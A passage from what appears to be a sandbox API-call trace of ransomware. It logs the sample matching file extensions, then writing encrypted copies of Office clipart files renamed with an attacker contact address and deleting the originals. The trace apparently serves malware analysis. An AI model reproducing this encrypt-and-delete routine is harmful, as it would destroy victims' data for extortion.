returned 4 [0268.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString=".7z") returned 3 [0268.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString=".dbf") returned 4 [0268.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString=".1cd") returned 4 [0268.689] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString=".jpg") returned 4 [0268.689] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString=".doc") returned 4 [0268.689] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString=".docx") returned 5 [0268.689] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.689] lstrlenW (lpString=".pdf") returned 4 [0268.689] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString=".xls") returned 4 [0268.689] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.689] lstrlenW (lpString=".xlsx") returned 5 [0268.689] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.689] lstrlenW (lpString=".ppt") returned 4 [0268.689] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.689] lstrlenW (lpString=".zip") returned 4 [0268.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.690] lstrlenW (lpString=".rar") returned 4 [0268.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.690] lstrlenW (lpString=".bz2") returned 4 [0268.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.690] lstrlenW (lpString=".7z") returned 3 [0268.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.690] lstrlenW (lpString=".dbf") returned 4 [0268.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.690] lstrlenW (lpString=".1cd") returned 4 [0268.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 63 [0268.690] lstrlenW (lpString=".jpg") returned 4 [0268.690] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.690] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.690] lstrlenW (lpString="DD00419_.WMF") returned 12 [0268.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.691] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=712) returned 1 [0268.691] CloseHandle (hObject=0x37c) returned 1 [0268.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 0x20 [0268.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.691] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.691] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.691] GetLastError () returned 0x0 [0268.691] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x2c8, lpOverlapped=0x0) returned 1 [0268.692] WriteFile (in: hFile=0x390, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2d0, lpOverlapped=0x0) returned 1 [0268.693] ReadFile (in: hFile=0x37c, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.693] WriteFile (in: hFile=0x390, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.693] SetEndOfFile (hFile=0x390) returned 1 [0268.693] CloseHandle (hObject=0x390) returned 1 [0268.693] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.693] SetEndOfFile (hFile=0x37c) returned 1 [0268.700] CloseHandle (hObject=0x37c) returned 1 [0268.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.886] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf")) returned 1 [0268.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.887] lstrlenW (lpString=".doc") returned 4 [0268.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.887] lstrlenW (lpString=".docx") returned 5 [0268.887] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.887] lstrlenW (lpString=".pdf") returned 4 [0268.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.887] lstrlenW (lpString=".xls") returned 4 [0268.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.887] lstrlenW (lpString=".xlsx") returned 5 [0268.887] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.887] lstrlenW (lpString=".ppt") returned 4 [0268.887] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.887] lstrlenW (lpString=".zip") returned 4 [0268.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.887] lstrlenW (lpString=".rar") returned 4 [0268.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.887] lstrlenW (lpString=".bz2") returned 4 [0268.887] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.887] lstrlenW (lpString=".7z") returned 3 [0268.887] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.887] lstrlenW (lpString=".dbf") returned 4 [0268.887] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.888] lstrlenW (lpString=".1cd") returned 4 [0268.888] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.888] lstrlenW (lpString=".jpg") returned 4 [0268.888] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.888] lstrlenW (lpString=".doc") returned 4 [0268.888] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString=".docx") returned 5 [0268.888] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.888] lstrlenW (lpString=".pdf") returned 4 [0268.888] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString=".xls") returned 4 [0268.888] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.888] lstrlenW (lpString=".xlsx") returned 5 [0268.888] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.888] lstrlenW (lpString=".ppt") returned 4 [0268.888] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.888] lstrlenW (lpString=".zip") returned 4 [0268.888] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.888] lstrlenW (lpString=".rar") returned 4 [0268.889] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.889] lstrlenW (lpString=".bz2") returned 4 [0268.889] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.889] lstrlenW (lpString=".7z") returned 3 [0268.889] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.889] lstrlenW (lpString=".dbf") returned 4 [0268.889] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.889] lstrlenW (lpString=".1cd") returned 4 [0268.889] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0268.889] lstrlenW (lpString=".jpg") returned 4 [0268.889] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.889] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.889] lstrlenW (lpString="DD00449_.WMF") returned 12 [0268.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.894] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=9992) returned 1 [0268.894] CloseHandle (hObject=0x390) returned 1 [0268.894] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 0x20 [0269.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0269.107] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.107] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0269.108] GetLastError () returned 0x0 [0269.108] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x2708, lpOverlapped=0x0) returned 1 [0269.111] WriteFile (in: hFile=0x3a0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x2710, lpOverlapped=0x0) returned 1 [0269.111] ReadFile (in: hFile=0x390, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.111] WriteFile (in: hFile=0x3a0, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.112] SetEndOfFile (hFile=0x3a0) returned 1 [0269.112] CloseHandle (hObject=0x3a0) returned 1 [0269.112] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.112] SetEndOfFile (hFile=0x390) returned 1 [0269.121] CloseHandle (hObject=0x390) returned 1 [0269.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0269.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.152] lstrlenW (lpString=".doc") returned 4 [0269.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString=".docx") returned 5 [0269.152] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.152] lstrlenW (lpString=".pdf") returned 4 [0269.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString=".xls") returned 4 [0269.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.152] lstrlenW (lpString=".xlsx") returned 5 [0269.152] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.152] lstrlenW (lpString=".ppt") returned 4 [0269.152] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.152] lstrlenW (lpString=".zip") returned 4 [0269.152] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.152] lstrlenW (lpString=".rar") returned 4 [0269.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString=".bz2") returned 4 [0269.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString=".7z") returned 3 [0269.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.152] lstrlenW (lpString=".dbf") returned 4 [0269.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.152] lstrlenW (lpString=".1cd") returned 4 [0269.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.153] lstrlenW (lpString=".jpg") returned 4 [0269.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.153] lstrlenW (lpString=".doc") returned 4 [0269.153] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.153] lstrlenW (lpString=".docx") returned 5 [0269.153] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.153] lstrlenW (lpString=".pdf") returned 4 [0269.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.153] lstrlenW (lpString=".xls") returned 4 [0269.153] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.153] lstrlenW (lpString=".xlsx") returned 5 [0269.153] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.153] lstrlenW (lpString=".ppt") returned 4 [0269.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.153] lstrlenW (lpString=".zip") returned 4 [0269.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.154] lstrlenW (lpString=".rar") returned 4 [0269.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.154] lstrlenW (lpString=".bz2") returned 4 [0269.154] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.154] lstrlenW (lpString=".7z") returned 3 [0269.154] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.154] lstrlenW (lpString=".dbf") returned 4 [0269.154] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.154] lstrlenW (lpString=".1cd") returned 4 [0269.154] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63 [0269.154] lstrlenW (lpString=".jpg") returned 4 [0269.154] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.154] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.154] lstrlenW (lpString="DD01140_.WMF") returned 12 [0269.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.158] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=3616) returned 1 [0269.158] CloseHandle (hObject=0x348) returned 1 [0269.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 0x20 [0269.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.165] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.165] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.165] GetLastError () returned 0x0 [0269.165] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0xe20, lpOverlapped=0x0) returned 1 [0269.167] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xe30, lpOverlapped=0x0) returned 1 [0269.168] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.168] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.168] SetEndOfFile (hFile=0x388) returned 1 [0269.168] CloseHandle (hObject=0x388) returned 1 [0269.168] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.168] SetEndOfFile (hFile=0x384) returned 1 [0269.170] CloseHandle (hObject=0x384) returned 1 [0269.170] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.170] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0269.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.170] lstrlenW (lpString=".doc") returned 4 [0269.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString=".docx") returned 5 [0269.171] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.171] lstrlenW (lpString=".pdf") returned 4 [0269.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString=".xls") returned 4 [0269.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.171] lstrlenW (lpString=".xlsx") returned 5 [0269.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.171] lstrlenW (lpString=".ppt") returned 4 [0269.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.171] lstrlenW (lpString=".zip") returned 4 [0269.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.171] lstrlenW (lpString=".rar") returned 4 [0269.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString=".bz2") returned 4 [0269.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString=".7z") returned 3 [0269.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.171] lstrlenW (lpString=".dbf") returned 4 [0269.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.171] lstrlenW (lpString=".1cd") returned 4 [0269.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.171] lstrlenW (lpString="C:\\Program 